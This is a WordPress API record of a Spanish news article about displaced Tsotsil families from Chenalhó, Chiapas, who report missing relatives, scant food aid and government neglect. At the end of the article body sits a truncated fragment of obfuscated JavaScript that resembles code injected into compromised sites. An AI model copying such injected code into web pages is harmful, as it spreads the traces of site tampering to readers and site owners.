{"id":11309,"date":"2023-08-14T01:58:56","date_gmt":"2023-08-14T01:58:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11309"},"modified":"2023-08-14T01:58:56","modified_gmt":"2023-08-14T01:58:56","slug":"sin-atencion-desplazados-de-chenalho-por-conflictos-de-tierra","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11309","title":{"rendered":"Sin atenci\u00f3n desplazados de Chenalh\u00f3, por conflictos de tierra"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-12-at-1.49.31-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-11310\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-12-at-1.49.31-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-12-at-1.49.31-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-12-at-1.49.31-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-12-at-1.49.31-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-12-at-1.49.31-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Manuel G\u00f3mez Velasco, vocero de los desplazados de Santa Martha, Municipio de Chenalh\u00f3, asegur\u00f3 que poco ha sido el apoyo de parte de las autoridades del Gobierno, incluyendo las del presidente municipal Abraham Cruz,  para sobrevivir en un campamento desde hace m\u00e1s de un a\u00f1o, adem\u00e1s que no hay respuesta para la  localizaci\u00f3n de los desaparecidos.Entrevistado tras el evento p\u00fablico de la aspirante a la Coordinaci\u00f3n de Defensa de la Transformaci\u00f3n Claudia Sheinbaum este fin de semana en San Crist\u00f3bal, el ind\u00edgena Tsotsil asegur\u00f3 que son 5 desaparecidos entre ellos 3 hombres: Juan Ruiz Ruiz, Jos\u00e9 Miguel Ruiz Velasco, David Ruiz Velasco; dos mujeres Magdalena  Velazco P\u00e9rez,  y una ni\u00f1a de 12 a\u00f1os Amalia Ruiz Velasco, pero hasta la fecha no han tenido respuesta favorable, por eso acudieron, con la intenci\u00f3n de ser vistos.\u201cEstamos exigiendo al gobierno que nos atienda, que se aplique el estado de derecho. El gobierno est\u00e1 haciendo caso omiso, no se si porque somos ind\u00edgenas, pero aunque seamos ind\u00edgenas tenemos los mismos derechos. Hemos pedido al gobierno que vayan a buscar a los desaparecidos, pero no lo han hecho, no ha entrado la guardia nacional, ni la fiscal\u00eda en el lugar de los hechos\u201d, dijo.Afirm\u00f3 que actualmente en el campamento que mantienen, a m\u00e1s de un a\u00f1o, hay personas con problemas de salud, sin embargo, nadie del sector salud ha llegado y ellos tienen que solventar los medicamentos y consultas con particulares.Ante la omisi\u00f3n del gobierno, lament\u00f3 que sigan d\u00e1ndose m\u00e1s desplazamientos, ya que la semana pasada, fue expulsada la se\u00f1ora Gloria Velasco Velasco, con toda su familia, por lo que urge la intervenci\u00f3n y presencia de las autoridades.G\u00f3mez Velasco, detall\u00f3 que para dos meses, les han llevado 25 kilos de ma\u00edz y 8 kilos de maseca, \u201cnos llegan alimentos por familia, pero hay quienes son de 8 personas por familia, y usan un kilo de maseca en la ma\u00f1ana y otro quilo por la tarde y no les dura ni una semana\u201d.\u201cEl presidente municipal pero, lo desconozco si est\u00e1 echando la mano o est\u00e1 en nuestra contra, no ha dicho nada al respecto, est\u00e1 a favor de la mayor\u00eda, sabemos que siempre est\u00e1 a favor, \u00e9l deber\u00eda ver la forma de solucionar el problema\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Manuel G\u00f3mez Velasco, vocero de los desplazados de Santa Martha, Municipio de Chenalh\u00f3, asegur\u00f3 que poco ha sido el apoyo de parte de las autoridades del Gobierno, incluyendo las del presidente municipal Abraham Cruz, para sobrevivir en un campamento desde hace m\u00e1s de un a\u00f1o, adem\u00e1s que no hay &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11310,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11309","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11309"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11309\/revisions"}],"predecessor-version":[{"id":11311,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11309\/revisions\/11311"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11310"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}